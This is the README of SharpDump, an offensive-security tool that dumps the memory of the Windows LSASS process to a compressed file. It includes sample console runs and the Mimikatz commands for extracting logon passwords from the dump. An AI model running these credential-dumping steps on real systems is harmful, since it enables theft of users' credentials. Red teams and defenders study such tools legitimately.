SharpDump is a C# port of PowerSploit"s Out-Minidump.ps1 functionality. The MiniDumpWriteDump Win32 API call is used to create a minidump for the process ID specified (LSASS by default) to C:\Windows\Temp\debug.out, GZipStream is used to compress the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted.
@harmj0y is the primary author of this port.
SharpDump is licensed under the BSD 3-Clause license.
Dump LSASS:
C:\Temp>SharpDump.exe
[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out
[+] Dumping completed. Rename file to "debug808.gz" to decompress.
[*] Operating System : Windows 10 Enterprise N
[*] Architecture : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
Dump a specific process ID:
C:\Temp>SharpDump.exe 8700
[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out
[+] Dumping completed. Rename file to "debug8700.gz" to decompress.
We are not planning on releasing binaries for SharpDump, so you will have to compile yourself :)
SharpDump has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.